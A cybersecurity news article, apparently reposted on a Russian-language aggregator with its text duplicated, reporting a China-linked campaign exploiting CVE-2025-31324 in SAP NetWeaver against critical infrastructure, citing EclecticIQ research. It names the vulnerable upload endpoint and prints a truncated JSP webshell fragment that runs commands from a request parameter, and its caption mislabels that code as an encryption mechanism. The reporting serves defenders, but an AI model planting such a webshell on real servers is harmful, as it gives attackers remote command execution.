Chinese Hackers Exploit SAP NetWeaver 0-Day Vulnerability To Attack Critical Infrastructures
- С сайта: Vulnerability(cybersecuritynews.com)
- Вернуться к списку новостей
С сайта: Vulnerability(cybersecuritynews.com)
In April 2025, security researchers identified a sophisticated campaign targeting critical infrastructure networks worldwide through a previously unknown vulnerability in SAP NetWeaver Visual Composer.
The vulnerability, tracked as CVE-2025-31324, allows unauthenticated attackers to upload malicious files and gain remote code execution capabilities on affected systems without requiring user authentication or special access privileges.
The attacks primarily impacted organizations in the United Kingdom’s natural gas distribution networks, water management utilities, United States medical device manufacturing plants, upstream oil and gas companies, and Saudi Arabian government ministries.
According to security reports, the compromised SAP systems were connected to industrial control system (ICS) networks, significantly increasing the potential impact of these intrusions.
Intelligence gathered from exposed attacker infrastructure revealed links to multiple China-nexus Advanced Persistent Threat (APT) groups, including UNC5221, UNC5174, and CL-STA-0048.
.webp)
EclecticIQ TIP Graph View – SAP NetWeaver Intrusions (Source – EclecticIQ)
These threat actors are believed to have connections to China’s Ministry of State Security (MSS) or affiliated private entities, operating with strategic objectives to compromise critical infrastructure worldwide.
EclecticIQ analysts identified an openly accessible directory on an attacker-controlled server (15.204.56.106), which contained detailed lists of compromised systems and the tools used in the campaign.
According to their analysis, the server hosted two result files documenting over 581 SAP NetWeaver instances compromised and backdoored with webshells, along with a list of 1,800 domains running SAP NetWeaver marked as potential targets.
The attack vector leveraged the “/developmentserver/metadatauploader” API endpoint in SAP NetWeaver to upload malicious webshells, providing attackers with persistent remote access.
EclecticIQ researchers discovered two primary webshells deployed across victim systems: coreasp.jsp and forwardsap.jsp.
Anatomy of the Webshell Payloads
The more sophisticated of the two webshells, coreasp.jsp, employed advanced obfuscation and encryption techniques to evade detection.
.webp)
Coreasp Webshell source code (Source – EclecticIQ)
The webshell revealing its encryption mechanism:-
"); Process p = Runtime.getRuntime().exec(request.getParameter("cmdhghgghhdd")); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); } out.println(""); out.println(""); } %>
This lightweight backdoor accepts system commands via a parameter named “cmdhghgghhdd” and returns the output directly to the browser, functioning as a fallback access method if the more sophisticated encrypted channel fails.
EclecticIQ researchers noted the webshells closely resemble Behinder/冰蝎 v3, a toolset commonly used by Chinese-speaking threat actors, providing additional evidence linking the campaign to China-nexus operators.
#Cyber_Security_News #Vulnerability #cyber_security_news #vulnerability
Оригинальная версия на сайте:
Chinese Hackers Exploit SAP NetWeaver 0-Day Vulnerability To Attack Critical Infrastructures
Author: Tushar Subhra DuttaIn April 2025, security researchers identified a sophisticated campaign targeting critical infrastructure networks worldwide through a previously unknown vulnerability in SAP NetWeaver Visual Composer.
The vulnerability, tracked as CVE-2025-31324, allows unauthenticated attackers to upload malicious files and gain remote code execution capabilities on affected systems without requiring user authentication or special access privileges.
The attacks primarily impacted organizations in the United Kingdom’s natural gas distribution networks, water management utilities, United States medical device manufacturing plants, upstream oil and gas companies, and Saudi Arabian government ministries.
According to security reports, the compromised SAP systems were connected to industrial control system (ICS) networks, significantly increasing the potential impact of these intrusions.
Intelligence gathered from exposed attacker infrastructure revealed links to multiple China-nexus Advanced Persistent Threat (APT) groups, including UNC5221, UNC5174, and CL-STA-0048.
EclecticIQ TIP Graph View – SAP NetWeaver Intrusions (Source – EclecticIQ)These threat actors are believed to have connections to China’s Ministry of State Security (MSS) or affiliated private entities, operating with strategic objectives to compromise critical infrastructure worldwide.
EclecticIQ analysts identified an openly accessible directory on an attacker-controlled server (15.204.56.106), which contained detailed lists of compromised systems and the tools used in the campaign.
According to their analysis, the server hosted two result files documenting over 581 SAP NetWeaver instances compromised and backdoored with webshells, along with a list of 1,800 domains running SAP NetWeaver marked as potential targets.
The attack vector leveraged the “/developmentserver/metadatauploader” API endpoint in SAP NetWeaver to upload malicious webshells, providing attackers with persistent remote access.
EclecticIQ researchers discovered two primary webshells deployed across victim systems: coreasp.jsp and forwardsap.jsp.
Anatomy of the Webshell Payloads
The more sophisticated of the two webshells, coreasp.jsp, employed advanced obfuscation and encryption techniques to evade detection.
Coreasp Webshell source code (Source – EclecticIQ)The webshell revealing its encryption mechanism:-
"); Process p = Runtime.getRuntime().exec(request.getParameter("cmdhghgghhdd")); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); } out.println(""); out.println(""); } %>
This lightweight backdoor accepts system commands via a parameter named “cmdhghgghhdd” and returns the output directly to the browser, functioning as a fallback access method if the more sophisticated encrypted channel fails.
EclecticIQ researchers noted the webshells closely resemble Behinder/冰蝎 v3, a toolset commonly used by Chinese-speaking threat actors, providing additional evidence linking the campaign to China-nexus operators.
#Cyber_Security_News #Vulnerability #cyber_security_news #vulnerability
Оригинальная версия на сайте:
